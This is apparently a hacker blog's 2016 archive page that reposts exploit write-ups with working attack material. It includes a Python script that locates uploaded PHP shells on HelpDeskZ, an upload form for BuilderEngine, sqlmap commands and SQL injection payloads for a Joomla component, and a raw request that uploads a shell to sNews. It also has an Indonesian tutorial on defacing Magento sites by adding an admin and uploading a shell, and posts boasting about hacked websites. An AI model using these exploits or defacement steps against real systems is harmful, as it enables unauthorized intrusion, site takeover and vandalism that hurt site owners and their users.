Popular Post

Popular Posts

Recent post

Archive for 2016

'''
# Exploit Title: HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
# Google Dork: intext:"Help Desk Software by HelpDeskZ"
# Date: 2016-08-26
# Exploit Author: Lars Morgenroth - @krankoPwnz
# Vendor Homepage: http://www.helpdeskz.com/
# Software Link: https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip
# Version: <= v1.0.2
# Tested on:
# CVE :
 
HelpDeskZ <= v1.0.2 suffers from an unauthenticated shell upload vulnerability.
 
The software in the default configuration allows upload for .php-Files ( ?!?! ). I think the developers thought it was no risk, because the filenames get "obfuscated" when they are uploaded. However, there is a weakness in the rename function of the uploaded file:
 
/controllers <https://github.com/evolutionscript/HelpDeskZ-1.0/tree/006662bb856e126a38f2bb76df44a2e4e3d37350/controllers>/*submit_ticket_controller.php - Line 141*
$filename = md5($_FILES['attachment']['name'].time()).".".$ext;
 
So by guessing the time the file was uploaded, we can get RCE.
 
Steps to reproduce:
 
http://localhost/helpdeskz/?v=submit_ticket&action=displayForm
 
Enter anything in the mandatory fields, attach your phpshell.php, solve the captcha and submit your ticket.
 
Call this script with the base url of your HelpdeskZ-Installation and the name of the file you uploaded:
 
exploit.py http://localhost/helpdeskz/ phpshell.php
'''           
import hashlib
import time
import sys
import requests
 
print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
 
if len(sys.argv) < 3:
    print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
    sys.exit(1)
 
helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]
 
currentTime = int(time.time())
 
for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext).hexdigest()
 
    url = helpdeskzBaseUrl+md5hash+'.php'
    response = requests.head(url)
    if response.status_code == 200:
        print "found!"
        print url
        sys.exit(0)
 
print "Sorry, I did not find anything"

HelpDeskZ 1.0.2 - Unauthenticated Arbitrary File Upload

Rabu, 30 November 2016
Author : ./B1TCHx Comments : 1
Tag :
<!--
# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
# Date: 18/09/2016
# Exploit Author: metanubix
# Vendor Homepage: http://builderengine.org/
# Software Link: http://builderengine.org/page-cms-download.html
# Version: 3.5.0
# Tested on: Kali Linux 2.0 64 bit
# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"
 
1) Unauthenticated Unrestricted File Upload:
 
    POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/
 
    Vulnerable Parameter: files[]
 
    We can upload test.php and reach the file via the following link:
    /files/test.php
-->
<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
    <input type="file" name="files[]" />
    <input type="submit" value="send" />
</form>
</body>
</html>

BuilderEngine 3.5.0 - Arbitrary File Upload

Author : ./B1TCHx Comments : 0
Tag :
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: info@huge-it.com
Description: A video slideshow gallery.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php.
 
Vulnerable Code in : ajax_url.php
 
 11 define('_JEXEC',1);
 12 defined('_JEXEC') or die('Restircted access');
.
.
.
 28         if($_POST['task']=="load_videos_content"){
 29
 30             $page = 1;
 31
 32
 33             if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){
 34                 $paramssld='';
 35                 $db5 = JFactory::getDBO();
 36                 $query5 = $db->getQuery(true);
 37                 $query5->select('*');
 38                 $query5->from('#__huge_it_videogallery_params');
 39                 $db->setQuery($query5);
 40                 $options_params = $db5->loadObjectList();
 41                 foreach ($options_params as $rowpar) {
 42                     $key = $rowpar->name;
 43                     $value = $rowpar->value;
 44                     $paramssld[$key] = $value;
 45                 }
 46                 $page = $_POST["page"];
 47                 $num=$_POST['perpage'];
 48                 $start = $page * $num - $num;
 49                 $idofgallery=$_POST['galleryid'];
 50
 51                 $query = $db->getQuery(true);
 52                 $query->select('*');
 53                 $query->from('#__huge_it_videogallery_videos');
 54                 $query->where('videogallery_id ='.$idofgallery);
 55                 $query ->order('#__huge_it_videogallery_videos.ordering asc');
 56                 $db->setQuery($query,$start,$num);
 
CVE-2016-1000123
Exploit Code:
  aC/ $ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2"  --level=5 --risk=3
  aC/ .
  aC/ .
  aC/ .
  aC/ (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
  aC/ sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
  aC/ ---
  aC/ Parameter: #1* ((custom) POST)
  aC/     Type: error-based
  aC/     Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
  aC/     Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2
  aC/ 
  aC/     Type: AND/OR time-based blind
  aC/     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
  aC/     Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
  aC/ ---
  aC/ [19:36:55] [INFO] the back-end DBMS is MySQL
  aC/ web server operating system: Linux Debian 8.0 (jessie)
  aC/ web application technology: Apache 2.4.10
  aC/ back-end DBMS: MySQL >= 5.0.12
  aC/ [19:36:55] [WARNING] HTTP error codes detected during run:
  aC/ 500 (Internal Server Error) - 2714 times
  aC/ [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
  aC/ 
  aC/ [*] shutting down at 19:36:55
Advisory: http://www.vapidlabs.com/advisory.php?v=169

Joomla! Component 'com_videogallerylite' 1.0.9 - SQL Injection

Author : ./B1TCHx Comments : 0
Tag :
# Exploit Title : Snews CMS upload sheller
# Author : Ashiyane Digital Security Team
# Google Dork : "This site is powered by sNews"
# Date :  04/11/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://snewscms.com/
# Software link : http://snewscms.com/download/snews1.7.1.zip
# Version : 1.7(latest)
#######################################################3
need admin access for upload files but we can upload any file  without
bypass(.php,.exe,....)
1-goto http://SiteName/snews_files/
2- click on Browse botton and select you`re file
3- click on upload
sheller path is :
http://SiteName/shell.php
 
poc url:
http://localhost/snews_files/
 
Poc header:
 
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/snews_files/
Cookie: PHPSESSID=am9ffv1sg2kjkfnaku69tfgsu5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
boundary=---------------------------92741037415004
Content-Length: 665
 
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="upload_dir"\r\n
\r\n
.\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="imagefile"; filename="shell.php"\r\n
Content-Type: application/\r\n
\r\n
<?php phpinfo ?><br>\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="ip"\r\n
\r\n
127.0.0.1\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="time"\r\n
\r\n
1478199661\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="upload"\r\n
\r\n
Upload\r\n
-----------------------------92741037415004--\r\n

sNews 1.7.1 - Arbitrary File Upload

Author : ./B1TCHx Comments : 0
Tag :
Assalamualikum Wr.Wb

Kali ini saya akan share tutorial deface Magento Add Admin ^_^

Dork: “hair” inurl:/index.php/customer/account/login

ganti “hair” dengan kata” yg itu misal shoes

auto exploit : TOUCH!!!

 Masukin Target dengan > http://
Trus klick exploit
klo sukses tinggal login
=========================================
upload shell :


masuk ke site.com/downloader/
Anda harus punya file : magento.tgz DOWNLOAD GANN
masukin file magento.tgz di downloader
klo respon nya Cleaning cache bla”
berarti sukses
klo selain dri itu gagal
shell acces
site.com/kodox.php
klo respon nya 501
berarti gagal

Wasalamualaikum Wr.Wb

SUMBER:copyright Mr.Vendetta_404 - Indonesian Code Party

TUTORIAL Magento Add Admin

Author : ./B1TCHx Comments : 1
Tag :
ATMA MALIK:Sebuah Website Yg Mengandung Unsur Keagamaan Penyembah Dewa Matahari*KALO GK SALAH :'v

WEBSITE:http://atmamalik.org/

ATMA MALIK DI RETAS HACKER

Selasa, 29 November 2016
Author : ./B1TCHx Comments : 0
Tag :
Beberapa Waktu Lalu Team Hacker Dari Indonesia Menyerang Webstite Myanmar
Pesan Yg Di Sampaikan Oleh Team Muslim Cyber Corporation

 TENTANG SANGKUT MENYANGKUT DENGAN Save Muslim Rohingnya


Hasil gambar untuk #OpMyanmar

#OpMyanmar

Author : ./B1TCHx Comments : 0
Tag :
Navigation

Weekly most viewed

Blogroll

- Copyright © ./B1TCHx a.k.a Patih - Devil Survivor 2 - Powered by Blogger - Designed by Johanes Djogan -